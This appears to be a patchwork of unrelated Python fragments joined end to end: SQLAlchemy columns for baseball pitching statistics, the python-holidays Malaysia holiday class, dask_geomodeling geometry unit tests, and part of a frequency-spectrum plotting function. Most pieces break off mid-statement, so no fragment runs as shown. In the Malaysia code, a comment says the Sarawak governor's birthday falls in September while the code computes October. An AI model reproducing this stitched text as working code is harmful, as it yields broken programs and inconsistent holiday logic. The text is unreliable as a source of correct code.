Column("wFS/C (pi)", Float, nullable=True),
Column("RS/9", Float, nullable=True),
Column("vFA (pfx)", Float, nullable=True),
Column("CBv", Float, nullable=True),
Column("Swing", Float, nullable=True),
Column("W", Float, nullable=True),
Column("O-Swing (pfx)", Float, nullable=True),
Column("wSL (pi)", Float, nullable=True),
Column("xFIP", Float, nullable=True),
Column("FO-Z (pfx)", Float, nullable=True),
Column("ER", Float, nullable=True),
Column("SI-Z (pfx)", Float, nullable=True),
Column("MD", Float, nullable=True),
Column("GB", Float, nullable=True),
Column("FC-X (pfx)", Float, nullable=True),
Column("Z-Swing (pi)", Float, nullable=True),
Column("wSF", Float, nullable=True),
Column("vKN (pi)", Float, nullable=True),
Column("HR/9", Float, nullable=True),
Column("CH (pfx)", Float, nullable=True),
Column("vSL (pfx)", Float, nullable=True),
Column("wSB (pi)", Float, nullable=True),
Column("FA-Z (pfx)", Float, nullable=True),
Column("Pull", Float, nullable=True),
Column("Z-Swing (pfx)", Float, nullable=True),
Column("FA (pfx)", Float, nullable=True),
Column("AVG", Float, nullable=True),
Column("wFS (pfx)", Float, nullable=True),
Column("FIP-", Float, nullable=True),
Column("K/BB", Float, nullable=True),
Column("TBF", Float, nullable=True),
Column("SI-X (pfx)", Float, nullable=True),
Column("wSI/C (pi)", Float, nullable=True),
Column("XX", Float, nullable=True),
Column("K", Float, nullable=True),
Column("F-Strike", Float, nullable=True),
Column("REW", Float, nullable=True),
Column("vFO (pfx)", Float, nullable=True),
Column("FB", Float, nullable=True),
Column("WPA/LI", Float, nullable=True),
Column("SL-Z (pi)", Float, nullable=True),
Column("FC-X (pi)", Float, nullable=True),
Column("wSI (pi)", Float, nullable=True),
Column("CU-Z (pfx)", Float, nullable=True),
Column("XX-X (pi)", Float, nullable=True),
Column("Contact (pfx)", Float, nullable=True),
Column("CTv", Float, nullable=True),
Column("FS-Z (pi)", Float, nullable=True),
Column("BABIP", Float, nullable=True),
Column("wFB", Float, nullable=True),
Column("CH-X (pi)", Float, nullable=True),
Column("wCH/C", Float, nullable=True),
Column("Pitches", Float, nullable=True),
Column("KN-X (pfx)", Float, nullable=True),
Column("RE24", Float, nullable=True),
Column("wKN/C (pi)", Float, nullable=True),
Column("wSL/C (pi)", Float, nullable=True),
Column("SC-Z (pfx)", Float, nullable=True),
Column("vXX (pi)", Float, nullable=True),
Column("Pace", Float, nullable=True),
Column("KN-X (pi)", Float, nullable=True),
Column("WPA", Float, nullable=True),
Column("CU-X (pfx)", Float, nullable=True),
Column("wFS (pi)", Float, nullable=True),
Column("gmLI", Float, nullable=True),
Column("Balls", Float, nullable=True),
Column("Swing (pi)", Float, nullable=True),
Column("FBv", Float, nullable=True),
Column("KC-Z (pfx)", Float, nullable=True),
Column("CG", Float, nullable=True),
Column("XX (pi)", Float, nullable=True),
Column("wFA (pfx)", Float, nullable=True),
Column("wCT/C", Float, nullable=True),
Column("R", Float, nullable=True),
Column("wCU/C (pi)", Float, nullable=True),
Column("O-Swing", Float, nullable=True),
Column("Starting", Float, nullable=True),
Column("WAR", Float, nullable=True),
Column("WHIP", Float, nullable=True),
Column("wXX/C (pi)", | |
# -*- coding: utf-8 -*-
# python-holidays
# ---------------
# A fast, efficient Python library for generating country, province and state
# specific sets of holidays on the fly. It aims to make determining whether a
# specific date is a holiday as fast and flexible as possible.
#
# Authors: dr-prodigy <<EMAIL>> (c) 2017-2022
# ryanss <<EMAIL>> (c) 2014-2017
# Website: https://github.com/dr-prodigy/python-holidays
# License: MIT (see LICENSE file)
from datetime import date, timedelta
from typing import Iterable, Optional, Union
from dateutil.easter import easter
from dateutil.relativedelta import relativedelta as rd, MO, FR, SA, SU
from dateutil.rrule import MONTHLY, rrule
from holidays.constants import (
JAN,
FEB,
MAR,
APR,
MAY,
JUN,
JUL,
AUG,
SEP,
OCT,
NOV,
DEC,
)
from holidays.constants import SUN
from holidays.holiday_base import HolidayBase
from holidays.utils import _ChineseLuniSolar, _islamic_to_gre
class Malaysia(HolidayBase):
country = "MY"
subdivisions = [
"JHR",
"KDH",
"KTN",
"MLK",
"NSN",
"PHG",
"PRK",
"PLS",
"PNG",
"SBH",
"SWK",
"SGR",
"TRG",
"KUL",
"LBN",
"PJY",
]
def __init__(
self,
years: Union[int, Iterable[int]] = None,
expand: bool = True,
observed: bool = True,
subdiv: Optional[str] = None,
prov: Optional[str] = None,
state: Optional[str] = None,
) -> None:
"""
An subclass of :py:class:`HolidayBase` representing public holidays in
Malaysia.
If ``subdiv`` for a state is not supplied, only nationwide holidays are
returned. The following ``subdiv`` state codes are used (ISO 3166-2
subdivision codes are not yet supported):
- JHR: Johor
- KDH: Kedah
- KTN: Kelantan
- MLK: Melaka
- NSN: Negeri Sembilan
- PHG: Pahang
- PRK: Perak
- PLS: Perlis
- PNG: Pulau Pinang
- SBH: Sabah
- SWK: Sarawak
- SGR: Selangor
- TRG: Terengganu
- KUL: FT Kuala Lumpur
- LBN: FT Labuan
- PJY: FT Putrajaya
Limitations:
- Prior to 2021: holidays are not accurate.
- 2027 and later: Thaipusam dates are are estimated, and so denoted.
Reference: `Wikipedia
<https://en.wikipedia.org/wiki/Public_holidays_in_Malaysia>`__
Country created by: `Eden <https://github.com/jusce17>`__
Country maintained by: `<NAME> <https://github.com/mborsetti>`__
See parameters and usage in :py:class:`HolidayBase`.
"""
self.cnls = _ChineseLuniSolar()
super().__init__(years, expand, observed, subdiv, prov, state)
def _populate(self, year):
# New Year's Day
if self.subdiv not in ("JHR", "KDH", "KTN", "PLS", "TRG"):
self[date(year, JAN, 1)] = "New Year's Day"
# Birthday of the Prophet Muhammad (s.a.w.).
# a.k.a. <NAME> (Sabah Act)
for hol_date in self.my_islamic_to_gre(year, 3, 12):
self[
hol_date
] = "<NAME> (Birthday of the Prophet Muhammad)"
# Hari Kebangsaan or National Day.
self[date(year, AUG, 31)] = "National Day"
# Chinese New Year (one day in the States of Kelantan and Terengganu,
# two days in the other States).
hol_date = self.cnls.lunar_n_y_date(year)
self[hol_date] = "Chinese New Year"
# The second day of Chinese New Year is not a federal holiday in
# Kelantan and Terengganu. However, it is gazetted as a state holiday
# in both states, effectively making it a nationwide holiday.
self[hol_date + rd(days=+1)] = "Chinese New Year Holiday"
# Wesak Day.
# Date of observance is announced yearly
# https://en.wikipedia.org/wiki/Vesak#Dates_of_observance
dates_obs = {
2001: (MAY, 7),
2002: (MAY, 27),
2003: (MAY, 15),
2004: (JUN, 2),
2005: (MAY, 23),
2006: (MAY, 12),
2007: (MAY, 31),
2008: (MAY, 19),
2009: (MAY, 9),
2010: (MAY, 28),
2011: (MAY, 17),
2012: (MAY, 5),
2013: (MAY, 24),
2014: (MAY, 13),
2015: (JUN, 1),
2016: (MAY, 20),
2017: (MAY, 10),
2018: (MAY, 29),
2019: (MAY, 19),
2020: (MAY, 7),
2021: (MAY, 26),
2022: (MAY, 15),
}
if year in dates_obs:
hol_date = date(year, *dates_obs[year])
self[hol_date] = "Vesak Day"
else:
hol_date = self.cnls.vesak_may_date(year)
self[hol_date] = "Vesak Day* (*estimated; ~10% chance +/- 1 day)"
# Birthday of [His Majesty] the Yang di-Pertuan Agong.
if year <= 2017:
hol_date = rrule(
MONTHLY,
dtstart=date(year, JUN, 1),
count=1,
bysetpos=1,
byweekday=SA,
)[0]
elif year == 2018:
hol_date = date(2018, SEP, 9)
else:
hol_date = rrule(
MONTHLY,
dtstart=date(year, JUN, 1),
count=1,
bysetpos=1,
byweekday=MO,
)[0]
self[hol_date] = "Birthday of SPB Yang di-Pertuan Agong"
# Hari Raya Puasa (2 days).
# aka Eid al-Fitr;
# exact date of observance is announced yearly
dates_obs = {
2001: [(DEC, 17)],
2002: [(DEC, 6)],
2003: [(NOV, 25)],
2004: [(NOV, 14)],
2005: [(NOV, 3)],
2006: [(OCT, 24)],
2007: [(OCT, 13)],
2008: [(OCT, 1)],
2009: [(SEP, 20)],
2010: [(SEP, 10)],
2011: [(AUG, 30)],
2012: [(AUG, 19)],
2013: [(AUG, 8)],
2014: [(JUL, 28)],
2015: [(JUL, 17)],
2016: [(JUL, 6)],
2017: [(JUN, 25)],
2018: [(JUN, 15)],
2019: [(JUN, 5)],
2020: [(MAY, 24)],
2021: [(MAY, 13)],
2022: [(MAY, 2)],
}
if year in dates_obs:
for date_obs in dates_obs[year]:
hol_date = date(year, *date_obs)
self[hol_date] = "Hari Raya Puasa"
self[hol_date + rd(days=+1)] = "Second day of Hari Raya Puasa"
else:
for date_obs in _islamic_to_gre(year, 10, 1):
hol_date = date_obs
self[hol_date] = "Hari Raya Puasa* (*estimated)"
self[hol_date + rd(days=+1)] = (
"Second day of Hari Raya Puasa*" " (*estimated)"
)
# Hari Raya Haji and Arafat Day.
# Date of observance is announced yearly.
dates_obs = {
2001: [(MAR, 6)],
2002: [(FEB, 23)],
2003: [(FEB, 12)],
2004: [(FEB, 1)],
2005: [(JAN, 21)],
2006: [(JAN, 10)],
2007: [(DEC, 20)],
2008: [(DEC, 8)],
2009: [(NOV, 27)],
2010: [(NOV, 17)],
2011: [(NOV, 6)],
2012: [(OCT, 26)],
2013: [(OCT, 15)],
2014: [(OCT, 5)],
2015: [(SEP, 24)],
2016: [(SEP, 12)],
2017: [(SEP, 1)],
2018: [(AUG, 22)],
2019: [(AUG, 11)],
2020: [(JUL, 31)],
2021: [(JUL, 20)],
2022: [(JUL, 9)],
}
if year in dates_obs:
for date_obs in dates_obs[year]:
hol_date = date(year, *date_obs)
self[hol_date] = "Hari Raya Haji"
if self.subdiv == "TRG":
# Arafat Day is one day before Eid al-Adha
self[hol_date - rd(days=1)] = "Arafat Day"
if self.subdiv in ("KDH", "KTN", "PLS", "TRG"):
# Second day
self[hol_date + rd(days=1)] = "Hari Raya Haji Holiday"
else:
for date_obs in _islamic_to_gre(year, 12, 10):
hol_date = date_obs
self[hol_date] = "Hari Raya Haji* (*estimated)"
if self.subdiv == "TRG":
# Arafat Day is one day before Eid al-Adha
self[hol_date - rd(days=1)] = "Arafat Day* (*estimated)"
if self.subdiv in ("KDH", "KTN", "PLS", "TRG"):
# Second day
self[
hol_date + rd(days=1)
] = "Hari Raya Haji Holiday* (*estimated)"
# Deepavali.
# aka Diwali;
# date of observance is announced yearly
if self.subdiv != "SWK":
dates_obs = {
2001: (NOV, 14),
2002: (NOV, 3),
2003: (OCT, 23),
2004: (NOV, 11),
2005: (NOV, 1),
2006: (OCT, 21),
2007: (NOV, 8),
2008: (OCT, 27),
2009: (OCT, 17),
2010: (NOV, 5),
2011: (OCT, 26),
2012: (NOV, 13),
2013: (NOV, 2),
2014: (OCT, 22),
2015: (NOV, 10),
2016: (OCT, 29),
2017: (OCT, 18),
2018: (NOV, 6),
2019: (OCT, 27),
2020: (NOV, 14),
2021: (NOV, 4),
2022: (NOV, 24),
}
if year in dates_obs:
hol_date = date(year, *dates_obs[year])
self[hol_date] = "Deepavali"
else:
hol_date = self.cnls.s_diwali_date(year)
self[hol_date] = "Deepavali* (*estimated; rarely on day after)"
# Christmas day.
self[date(year, DEC, 25)] = "Christmas Day"
# Malaysia Day.
self[date(year, SEP, 16)] = "Malaysia Day"
# ---------------------------------------------------------#
# Holidays from the Sarawak Ordinance (not included above) #
# ---------------------------------------------------------#
if self.subdiv == "SWK":
# Dayak Festival Day (the first day of June) and the following day.
self[date(year, JUN, 1)] = "Gawai Dayak"
self[date(year, JUN, 2)] = "Gawai Dayak (Second day)"
# The first day of May—Worker’s Celebration Day.
# Birthday of Tuan Yang Terutama Yang di-Pertua Negeri Sarawak (the
# second Saturday of September).
second_sat_oct = rrule(
MONTHLY,
dtstart=date(year, OCT, 1),
count=1,
bysetpos=2,
byweekday=SA,
)[0]
self[second_sat_oct] = "Birthday of the Governor of Sarawak"
# Sarawak Independence Day
if year > 2016:
self[date(year, JUL, 22)] = "Sarawak Day"
# Check for holidays that fall on a Sunday and
# implement Section 3 of Malaysian Holidays Act:
# "if any day specified in the Schedule falls on
# Sunday then the day following shall be a public
# holiday and if such day is already a public holiday,
# then the day following shall be a public holiday"
for (hol_date, hol_name) in list(self.items()):
if hol_date.year == year and hol_date.weekday() == SUN:
self[hol_date] += " [Sunday]"
in_lieu_date = hol_date + rd(days=+1)
while in_lieu_date in self:
in_lieu_date += rd(days=+1)
self[in_lieu_date] = hol_name + " [In lieu]"
# The last two days in May (Pesta Kaamatan).
# (Sarawak Act)
# Day | |
<filename>dask_geomodeling/tests/test_geometry.py
import os
import unittest
from datetime import datetime as Datetime
from datetime import timedelta as Timedelta
from numpy.testing import assert_almost_equal
from osgeo import ogr
from pandas.util.testing import assert_series_equal
from shapely.geometry import box, Point, Polygon
import geopandas as gpd
import numpy as np
import pandas as pd
from dask import config
from dask_geomodeling.utils import Extent, get_sr, shapely_transform
from dask_geomodeling.tests.factories import (
setup_temp_root,
teardown_temp_root,
MockGeometry,
MockRaster,
)
from dask_geomodeling.geometry import aggregate
from dask_geomodeling.geometry import set_operations
from dask_geomodeling.geometry import field_operations
from dask_geomodeling.geometry import geom_operations
from dask_geomodeling.geometry import parallelize
from dask_geomodeling.geometry import merge
from dask_geomodeling.geometry import text
from dask_geomodeling import geometry
def create_geojson(abspath, polygons=10, bbox=None, ndim=2, projection="EPSG:4326"):
"""Create random triangle polygons inside bbox"""
driver = ogr.GetDriverByName(str("GeoJSON"))
driver.DeleteDataSource(abspath)
datasource = driver.CreateDataSource(abspath)
layer = datasource.CreateLayer(
str("results"), get_sr(projection), geom_type=ogr.wkbPolygon
)
field_definition = ogr.FieldDefn(str("name"), ogr.OFTString)
layer.CreateField(field_definition)
field_definition = ogr.FieldDefn(str("id"), ogr.OFTInteger)
layer.CreateField(field_definition)
layer_definition = layer.GetLayerDefn()
if np.isscalar(polygons):
polygons = np.random.random((polygons, 3, ndim))
bbox_min = np.asarray(bbox[:ndim])
bbox_max = np.asarray(bbox[-ndim:])
polygons = polygons * (bbox_max - bbox_min) + bbox_min
for feature_id, coords in enumerate(polygons):
ring = ogr.Geometry(ogr.wkbLinearRing)
for coord in coords:
ring.AddPoint_2D(*coord)
ring.AddPoint_2D(*coords[0]) # close the ring
polygon = ogr.Geometry(ogr.wkbPolygon)
polygon.AddGeometry(ring)
feature = ogr.Feature(layer_definition)
feature.SetGeometry(polygon)
feature.SetField(str("name"), str("test"))
feature.SetField(str("id"), feature_id + 10)
layer.CreateFeature(feature)
layer.SyncToDisk()
datasource.SyncToDisk()
return polygons
class TestGeometryBlockAttrs(unittest.TestCase):
"""Tests properties that all geometry blocks share"""
def test_attrs(self):
""" Check compulsory attributes for all views in geometry.py """
missing = []
for name, klass in geometry.__dict__.items():
try:
if not issubclass(klass, geometry.GeometryBlock):
continue # skip non-RasterBlock objects
if klass is geometry.GeometryBlock:
continue # skip the baseclass
except TypeError:
continue # also skip non-classes
for attr in ("columns",):
if not hasattr(klass, attr):
print(name, attr)
missing.append([name, attr])
if len(missing) > 0:
print(missing)
self.assertEqual(0, len(missing))
class TestGeometryFileSource(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.root = setup_temp_root()
# paths
cls.relpath = "test.json"
cls.abspath = os.path.join(cls.root, "test.json")
cls.url = "file://" + cls.abspath
@classmethod
def tearDownClass(cls):
teardown_temp_root(cls.root)
def setUp(self):
self.bbox = (0, 0, 1, 1)
self.projection = "EPSG:4326"
self.polygons = create_geojson(
self.abspath, bbox=(0, 0, 1, 1), polygons=10, ndim=2, projection="EPSG:4326"
)
self.id_field = "id"
self.source = geometry.GeometryFileSource(self.url, id_field="id")
def test_attr(self):
self.assertEqual(self.source.url, self.url)
self.assertEqual(self.source.path, self.abspath)
self.assertEqual(self.source.id_field, self.id_field)
def test_columns(self):
self.assertSetEqual(self.source.columns, {"id", "name", "geometry"})
def test_get_data(self):
result = self.source.get_data(geometry=box(*self.bbox), projection="EPSG:4326")
self.assertEqual(self.projection, result["projection"])
self.assertEqual(10, len(result["features"]))
def test_get_data_centroid_mode(self):
triangle = [[[0.8, 0.8], [2.0, 0.8], [2.0, 2.0]]]
self.polygons = create_geojson(
self.abspath,
bbox=self.bbox,
polygons=triangle,
ndim=2,
projection="EPSG:4326",
)
result = self.source.get_data(
geometry=box(*self.bbox), projection="EPSG:4326", mode="centroid"
)
self.assertTrue(Polygon(*self.polygons).intersection(box(*self.bbox)))
self.assertFalse(Polygon(*self.polygons).centroid.within(box(*self.bbox)))
self.assertEqual(self.projection, result["projection"])
self.assertEqual(0, len(result["features"]))
def test_reproject(self):
extent = Extent(self.bbox, get_sr(self.projection))
bbox3857 = extent.transformed(get_sr("EPSG:3857")).bbox
result = self.source.get_data(geometry=box(*bbox3857), projection="EPSG:3857")
self.assertEqual("EPSG:3857", result["projection"])
self.assertEqual("epsg:3857", result["features"].crs["init"])
self.assertEqual(10, len(result["features"]))
def test_limit(self):
result = self.source.get_data(
geometry=box(*self.bbox), projection="EPSG:4326", limit=3
)
self.assertEqual(3, len(result["features"]))
def test_bbox(self):
square = np.array([(0.5, 0.5), (0.5, 0.6), (0.6, 0.6), (0.6, 0.5)])
outside = square + (1, 0)
edge = square + (0.45, 0.0)
# L shape just outside standard bbox (but envelope overlaps)
corner = np.array(
[(0.0, 2.0), (2.0, 2.0), (2.0, 0.0), (1.1, 0.0), (1.01, 1.1), (0.0, 1.1)]
)
create_geojson(
self.abspath,
polygons=(square, outside, edge, corner),
projection="EPSG:4326",
)
# square and edge
result = self.source.get_data(
geometry=box(0.0, 0.0, 1.0, 1.0), projection="EPSG:4326"
)
self.assertEqual(2, len(result["features"]))
# only square
result = self.source.get_data(
geometry=box(0.0, 0.0, 0.9, 1.0), projection="EPSG:4326"
)
self.assertEqual(1, len(result["features"]))
# point request, check all 4 corners
for x, y in [(0.5, 0.5), (0.5, 0.6), (0.6, 0.5), (0.6, 0.6)]:
result = self.source.get_data(
geometry=box(x, y, x, y), projection="EPSG:4326"
)
self.assertEqual(1, len(result["features"]))
# point request, check just outside all 4 edges
for x, y in [(0.49, 0.55), (0.61, 0.6), (0.55, 0.49), (0.6, 0.61)]:
result = self.source.get_data(
geometry=box(x, y, x, y), projection="EPSG:4326"
)
self.assertEqual(0, len(result["features"]))
def test_size_filter(self):
full = (0.0, 0.0), (0.0, 1.0), (1.0, 1.0), (1.0, 0.0)
small = (0.0, 0.0), (0.0, 0.1), (0.0, 0.1), (0.1, 0.0)
create_geojson(self.abspath, (full, small))
result = self.source.get_data(
geometry=box(*self.bbox), projection="EPSG:4326", min_size=1.1
)
self.assertEqual(0, len(result["features"]))
result = self.source.get_data(
geometry=box(*self.bbox), projection="EPSG:4326", min_size=0.9
)
self.assertEqual(1, len(result["features"]))
# no filter
result = self.source.get_data(
geometry=box(*self.bbox), projection="EPSG:4326", min_size=0
)
self.assertEqual(2, len(result["features"]))
def test_index(self):
# the index column is named source.id_field
result = self.source.get_data(
geometry=box(*self.bbox), projection="EPSG:4326", limit=1
)
self.assertEqual(self.source.id_field, result["features"].index.name)
def test_properties(self):
# all properties are produced from the file
result = self.source.get_data(
geometry=box(*self.bbox), projection="EPSG:4326", limit=1
)
self.assertIn("name", result["features"].columns)
def test_filters(self):
# filtering returns the matching features
result = self.source.get_data(
geometry=box(*self.bbox), projection="EPSG:4326", filters=dict(name="test")
)
self.assertEqual(10, len(result["features"]))
# and does not return non-matching features
result = self.source.get_data(
geometry=box(*self.bbox), projection="EPSG:4326", filters=dict(name="a")
)
self.assertEqual(0, len(result["features"]))
# filters on non-existing fields are ignored
result = self.source.get_data(
geometry=box(*self.bbox), projection="EPSG:4326", filters=dict(a=1)
)
self.assertEqual(10, len(result["features"]))
# attempting to use a django ORM expression raises ValueError
request = dict(geometry=box(*self.bbox), filters={"name__in": ["tst"]})
self.assertRaises(ValueError, self.source.get_data, **request)
def test_extent_mode(self):
result = self.source.get_data(geometry=box(*self.bbox), projection="EPSG:4326")
expected_extent = tuple(result["features"].total_bounds)
# extent matches the one obtained from the normal 'intersects' request
result = self.source.get_data(
mode="extent", geometry=box(*self.bbox), projection="EPSG:4326"
)
self.assertEqual("EPSG:4326", result["projection"])
self.assertTupleEqual(expected_extent, result["extent"])
# limit does not influence the extent
result = self.source.get_data(
mode="extent", geometry=box(*self.bbox), projection="EPSG:4326", limit=1
)
self.assertTupleEqual(expected_extent, result["extent"])
class TestSetOperations(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.root = setup_temp_root()
# paths
cls.relpath = "test.json"
cls.abspath = os.path.join(cls.root, "test.json")
cls.url = "file://" + cls.abspath
@classmethod
def tearDownClass(cls):
teardown_temp_root(cls.root)
def setUp(self):
self.request = {
"mode": "intersects",
"projection": "EPSG:3857",
"geometry": box(0, 0, 1, 1),
}
self.polygons = [((0.0, 0.0), (0.0, 2.0), (2.0, 2.0), (2.0, 0.0))]
self.source = MockGeometry(self.polygons)
self.empty = MockGeometry(polygons=[])
def test_intersect_with_request(self):
view = set_operations.Intersection(self.source, None)
# return only the intersection with the bbox
result = view.get_data(**self.request)
self.assertAlmostEqual(1.0, result["features"]["geometry"].iloc[0].area)
# return the intersected extent
self.request["mode"] = "extent"
result = view.get_data(**self.request)
self.assertTupleEqual((0.0, 0.0, 1.0, 1.0), result["extent"])
def test_difference(self):
# Define a second datasource to use in the difference operation
other = MockGeometry(
polygons=[((0.0, 0.0), (0.0, 1.0), (1.0, 1.0), (1.0, 0.0))]
)
view = set_operations.Difference(self.source, other)
# the request to other should have the source's extent as geometry
_, (_, other_req) = view.get_sources_and_requests(**self.request)
self.assertAlmostEqual(4.0, other_req["geometry"].area)
# the result should be the difference between the two polygons
result = view.get_data(**self.request)
self.assertEqual(1, len(result["features"]))
self.assertAlmostEqual(3.0, result["features"]["geometry"].iloc[0].area)
def test_difference_with_empty_source(self):
view = set_operations.Difference(self.empty, self.source)
# there should be no requests as source is empty
sources_and_requests = view.get_sources_and_requests(**self.request)
self.assertEqual(1, len(sources_and_requests))
self.assertIsNone(sources_and_requests[0][1])
# the result should be empty
result = view.get_data(**self.request)
self.assertEqual(0, len(result["features"]))
def test_difference_with_empty_other(self):
view = set_operations.Difference(self.source, self.empty)
# there should be requests as source was non-empty
sources_and_requests = view.get_sources_and_requests(**self.request)
self.assertEqual(2, len(sources_and_requests))
self.assertIsNotNone(sources_and_requests[0][1])
self.assertIsNotNone(sources_and_requests[1][1])
# but the result should be unchanged
result = view.get_data(**self.request)
self.assertEqual(1, len(result["features"]))
self.assertAlmostEqual(4.0, result["features"]["geometry"].iloc[0].area)
def test_difference_different_id(self):
# Define a second datasource that produces a geometry with different ID
other = MockGeometry(
polygons=[((0.0, 0.0), (0.0, 1.0), (1.0, 1.0), (1.0, 0.0))],
properties=[{"id": 21}],
)
view = set_operations.Difference(self.source, other)
# the result should contain the original geometry, unchanged
result = view.get_data(**self.request)
self.assertEqual(1, len(result["features"]))
self.assertAlmostEqual(4.0, result["features"]["geometry"].iloc[0].area)
def test_area(self):
view = geom_operations.Area(self.source, projection="EPSG:3857")
result = view.get_data(**self.request)
self.assertListEqual(result.tolist(), [Polygon(x).area for x in self.polygons])
def test_area_reproject(self):
view = geom_operations.Area(self.source, projection="EPSG:3857")
self.request["projection"] = "EPSG:4326"
result = view.get_data(**self.request)
np.testing.assert_almost_equal(
result.tolist(), [Polygon(x).area for x in self.polygons]
)
def test_area_empty(self):
view = geom_operations.Area(self.empty, projection="EPSG:3857")
result = view.get_data(**self.request)
self.assertEqual(0, len(result))
class TestConstructive(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.root = setup_temp_root()
# paths
cls.relpath = "test.json"
cls.abspath = os.path.join(cls.root, "test.json")
cls.url = "file://" + cls.abspath
@classmethod
def tearDownClass(cls):
teardown_temp_root(cls.root)
def setUp(self):
self.bbox = (0, 0, 1, 1)
self.projection = "EPSG:4326"
self.id_field = "id"
self.source = geometry.Simplify(
geometry.GeometryFileSource(self.url, id_field="id"),
tolerance=None,
preserve_topology=False,
)
def test_min_size_simplify(self):
trapezoid1 = (0.0, 0.0), (0.49, 1.0), (0.51, 1.0), (1.0, 0.0)
trapezoid2 = (0.0, 0.0), (0.4, 1.0), (0.6, 1.0), (1.0, 0.0)
create_geojson(self.abspath, (trapezoid1, trapezoid2))
# min_size = None does not simplify
result = self.source.get_data(
geometry=box(*self.bbox), projection="EPSG:4326", min_size=None
)
self.assertEqual(2, len(result["features"]))
geoms = result["features"].geometry.values
self.assertEqual(5, len(geoms[0].exterior.coords))
self.assertEqual(5, len(geoms[1].exterior.coords))
# min_size = 0.05 should simplify only the first trapezoid
result = self.source.get_data(
geometry=box(*self.bbox), projection="EPSG:4326", min_size=0.05
)
self.assertEqual(2, len(result["features"]))
geoms = result["features"].geometry.values
self.assertEqual(4, len(geoms[0].exterior.coords))
self.assertEqual(5, len(geoms[1].exterior.coords))
# min_size = 0.2 should simplify both
result = self.source.get_data(
geometry=box(*self.bbox), projection="EPSG:4326", min_size=0.2
)
self.assertEqual(2, len(result["features"]))
geoms = result["features"].geometry.values
self.assertEqual(4, len(geoms[0].exterior.coords))
self.assertEqual(4, len(geoms[1].exterior.coords))
class BufferTestCase(unittest.TestCase):
def test_buffer(self):
polygons = [((1, 1), (2, 1), (2, 2), (1, 2))]
source = geometry.Buffer(
MockGeometry(polygons), distance=1.0, projection="EPSG:3857", resolution=1
)
request = dict(
mode="intersects", projection="EPSG:3857", geometry=box(0, 0, 10, 10)
)
data = source.get_data(**request)
actual = data["features"].geometry.area
expected = pd.Series(7.0)
assert_series_equal(expected, actual, check_names=False)
def test_buffer_transform(self):
# Define a polygon in RD New (1 square meter).
polygon = (
(155000, 463000),
(155001, 463000),
(155001, 463001),
(155000, 463001),
)
# Apply a buffer of 10 cm.
| |
=====
datasets : pandas.DataFrame or dict
Dataset(s) with spectrum data. If more than one set,
datasets should be a dictionary with entries
<dataset_name>: dataset
fields : str, list, 'all' (or None)
Fieldname(s) corresponding to particular column(s) of
the datasets. fields can be None if input are Series.
'all' means all fields will be plotted (in this case all
datasets should have the same fields)
height : float (or None)
Height for which frequency spectra is plotted. If datasets
have no height dimension, height does not need to be specified.
times : str, int, float, list (or None)
Time(s) for which frequency spectra are plotted, specified as
either datetime strings or numerical values (seconds, e.g.,
simulation time). times can be None if all datasets combined
have no more than one time value.
fig : figure handle
Custom figure handle. Should be specified together with ax
ax : axes handle, or list or numpy ndarray with axes handles
Customand axes handle(s).
Size of ax should equal nfields * ntimes
fieldlimits : list or tuple, or dict
Value range for the various fields. If only one field is
plotted, fieldlimits can be a list or tuple. Otherwise, it
should be a dictionary with entries <fieldname>: fieldlimit.
Missing fieldlimits are set automatically
freqlimits : list or tuple
Frequency axis limits
fieldlabels : str or dict
Custom field labels. If only one field is plotted, fieldlabels
can be a string. Otherwise it should be a dictionary with
entries <fieldname>: fieldlabel
labelsubplots : bool, list or tuple
Label subplots as (a), (b), (c), ... If a list or tuple is given
their values should be the horizontal and vertical position
relative to each subaxis.
showlegend : bool (or None)
Label different plots and show legend. If None, showlegend is set
to True if legend will have more than one entry, otherwise it is
set to False.
ncols : int
Number of columns in axes grid, must be a true divisor of total
number of axes.
subfigsize : list or tuple
Standard size of subfigures
datasetkwargs : dict
Dataset-specific options that are passed on to the actual
plotting function. These options overwrite general options
specified through **kwargs. The argument should be a dictionary
with entries <dataset_name>: {**kwargs}
**kwargs : other keyword arguments
Options that are passed on to the actual plotting function.
Note that these options should be the same for all datasets,
fields and times, and they can not be used to set dataset,
field or time specific colors, limits, etc.
Example uses include setting linestyle/width, marker, etc.
"""
args = PlottingInput(
datasets=datasets,
fields=fields,
times=times,
fieldlimits=fieldlimits,
fieldlabels=fieldlabels,
)
nfields = len(args.fields)
ntimes = len(args.times)
ndatasets = len(args.datasets)
ntotal = nfields * ntimes
# Concatenate custom and standard field labels
# (custom field labels overwrite standard fields labels if existent)
args.fieldlabels = {**standard_spectrumlabels, **args.fieldlabels}
fig, ax, nrows, ncols = _create_subplots_if_needed(
ntotal,
ncols,
default_ncols=ntimes,
avoid_single_column=True,
sharex=True,
subfigsize=subfigsize,
wspace=0.3,
fig=fig,
ax=ax,
)
# Create flattened view of axes
axv = np.asarray(ax).reshape(-1)
# Set showlegend if not specified
if showlegend is None:
if ndatasets>1:
showlegend = True
else:
showlegend = False
# Loop over datasets, fields and times
for i, dfname in enumerate(args.datasets):
df = args.datasets[dfname]
frequencyvalues = _get_dim_values(df,'frequency',default_idx=True)
assert(frequencyvalues is not None), 'spectrum plot needs a frequency axis'
timevalues = _get_dim_values(df,'time')
# Create list with available fields only
available_fields = _get_available_fieldnames(df,args.fields)
for j, field in enumerate(args.fields):
# If available_fields is [None,], fieldname is unimportant
if available_fields == [None]:
pass
# Else, check if field is available
elif not field in available_fields:
print('Warning: field "'+field+'" not available in dataset '+dfname)
continue
for k, time in enumerate(args.times):
plotting_properties = {}
if showlegend:
plotting_properties['label'] = dfname
# Index of axis corresponding to field j and time k
axi = j*ntimes + k
# Axes mark up
if i==0 and ntimes>1:
axv[axi].set_title(pd.to_datetime(time).strftime('%Y-%m-%d %H%M UTC'),fontsize=16)
# Gather label, general options and dataset-specific options
# (highest priority to dataset-specific options, then general options)
try:
plotting_properties = {**plotting_properties,**kwargs,**datasetkwargs[dfname]}
except KeyError:
plotting_properties = {**plotting_properties,**kwargs}
# Get field spectrum
slice_t = _get_slice(df,time,'time')
slice_tz = _get_slice(slice_t,height,'height')
spectrum = _get_field(slice_tz,field).values
# Plot data
axv[axi].loglog(frequencyvalues[1:],spectrum[1:],**plotting_properties)
# Specify field limits if specified
try:
axv[axi].set_ylim(args.fieldlimits[field])
except KeyError:
pass
# Set frequency label
for c in range(ncols):
axv[ncols*(nrows-1)+c].set_xlabel('$f$ [Hz]')
# Specify field label if specified
for r in range(nrows):
try:
